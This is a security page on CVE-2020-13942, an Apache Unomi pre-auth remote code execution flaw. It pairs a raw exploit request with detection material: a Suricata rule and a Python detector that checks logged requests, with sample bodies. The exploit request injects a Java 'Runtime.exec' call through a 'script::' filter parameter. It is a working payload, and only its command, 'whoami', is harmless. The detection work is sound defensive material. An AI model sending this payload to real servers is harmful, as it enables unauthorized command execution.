CVE-2020-13942 Apache Unomi pre-auth RCE

CVE-2020-13942 exploit

POST /context.json HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/json
Content-Length: 200

{"filters":[{"id" : "test","filters": [{"condition": {"parameterValues": {"test": "script::Runtime.getRuntime().exec('whoami')"},"type":"profilePropertyCondition"}}]}],"sessionId": "test"}

CVE-2020-13942 Detection rules

alert http any any -> any any (msg:"ET EXPLOIT CVE-2020-13942 Apache Unomi pre-auth RCE"; flow:established,to_server; content:"POST"; http_method; content:"/context.json"; http_uri; content:"Runtime.getRuntime()"; http_client_body; nocase; content:".exec("; http_client_body; nocase; reference:url,twitter.com/chybeta/status/1328912309440311297; reference:cve,2020-13942; classtype:attempted-admin; sid:2031120; rev:2; metadata:affected_product Web_Server_Applications, attack_target Client_Endpoint, created_at 2020_11_18, former_category EXPLOIT, signature_severity Major, updated_at 2020_11_18;)
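
The rule above keys on two literal strings in the body. As an added example (not part of the original page or of the ET ruleset), the Python below applies the same conditions to logged requests and adds a structural check that parses the JSON and reports any `parameterValues` entry beginning with `script::`, the prefix seen in the request above. The function names and the two constructed sample bodies are hypothetical, and treating every `script::` value on this endpoint as alert-worthy is an assumption.

```python
import json

# Body strings the Suricata rule above requires (it matches them with nocase).
RULE_BODY_TOKENS = ("runtime.getruntime()", ".exec(")

def rule_match(method, uri, body):
    """Same conditions as the rule: POST, /context.json in the URI, both body strings."""
    low = body.lower()
    return (method == "POST" and "/context.json" in uri
            and all(tok in low for tok in RULE_BODY_TOKENS))

def script_values(node, path="$"):
    """Yield (json_path, value) for each parameterValues string starting with 'script::'."""
    if isinstance(node, dict):
        for key, val in node.items():
            child = f"{path}.{key}"
            if key == "parameterValues" and isinstance(val, dict):
                for name, pv in val.items():
                    if isinstance(pv, str) and pv.startswith("script::"):
                        yield f"{child}.{name}", pv
            yield from script_values(val, child)
    elif isinstance(node, list):
        for i, item in enumerate(node):
            yield from script_values(item, f"{path}[{i}]")

def inspect(method, uri, body):
    """Verdict for one logged request: rule-equivalent match plus the structural check."""
    verdict = {"rule_match": rule_match(method, uri, body),
               "script_params": [], "parse_error": False}
    if method == "POST" and "/context.json" in uri:
        try:
            verdict["script_params"] = list(script_values(json.loads(body)))
        except ValueError:
            verdict["parse_error"] = True  # unparseable JSON on this endpoint is worth logging
    verdict["alert"] = verdict["rule_match"] or bool(verdict["script_params"])
    return verdict

# PAGE_BODY is the request body shown on this page; the other two are constructed samples.
PAGE_BODY = '{"filters":[{"id" : "test","filters": [{"condition": {"parameterValues": {"test": "script::Runtime.getRuntime().exec(\'whoami\')"},"type":"profilePropertyCondition"}}]}],"sessionId": "test"}'
BENIGN_BODY = '{"sessionId": "s1", "filters": [{"id": "f1", "filters": [{"condition": {"type": "profilePropertyCondition", "parameterValues": {"propertyName": "properties.gender", "comparisonOperator": "equals", "propertyValue": "male"}}}]}]}'
SCRIPT_ONLY_BODY = '{"sessionId": "s2", "filters": [{"id": "f2", "filters": [{"condition": {"type": "profilePropertyCondition", "parameterValues": {"propertyName": "script::1+1"}}}]}]}'

if __name__ == "__main__":
    for label, body in (("page", PAGE_BODY), ("benign", BENIGN_BODY), ("script-only", SCRIPT_ONLY_BODY)):
        v = inspect("POST", "/context.json", body)
        print(label, "alert=%s rule=%s params=%s" % (v["alert"], v["rule_match"], v["script_params"]))
```

The third sample raises an alert through the structural check alone, since it contains neither of the strings the rule matches on.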